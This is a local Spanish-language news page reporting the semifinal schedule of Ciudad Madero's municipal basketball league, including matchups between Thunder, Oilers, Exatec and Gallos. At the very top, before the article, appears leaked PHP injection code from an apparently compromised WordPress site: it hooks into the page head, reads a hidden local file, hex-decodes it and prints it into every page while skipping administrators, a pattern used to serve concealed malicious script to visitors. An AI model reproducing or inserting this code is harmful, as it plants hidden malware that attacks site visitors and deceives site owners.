if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Quedan 4 en la lucha por el título de la Liga Municipal de Basquetbol de ciudad Madero – Reporte Noreste
Conéctate con nosotros

La Liga de Basquetbol de ciudad Madero llega a su etapa de semifinales en la categoría de Primera Fuerza, después de la eliminatoria en la que los equipos de Thunder y Exatec avanzaron tras vencer a la Fuerza Jaibos y Petrolera respectivamente.

Edgar Chacón Presidente de la Liga, detallo que las 4 escuadras que buscan el titulo de la Liga Municipal se enfrascaran en una serie a ganar de 2 de 3 partidos y lo harán de la siguiente manera.

El martes 2 de junio el primer juego entre Thunder y Oilers en punto de las 9 de la noche en el gimnasio “el mexicano”, mientras que la otra llave será entre Exatec y los Gallos, estos dos equipos esperaban rival al haberse clasificado en primero y segundo puesto de la tabla.

La actividad dentro de esta categoría no culmina con estos juegos, ya que también habrá un torneo relámpago para los no clasificados, a fin de mantenerlos en activo a pesar de haber sido eliminados.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Más en Sin categoría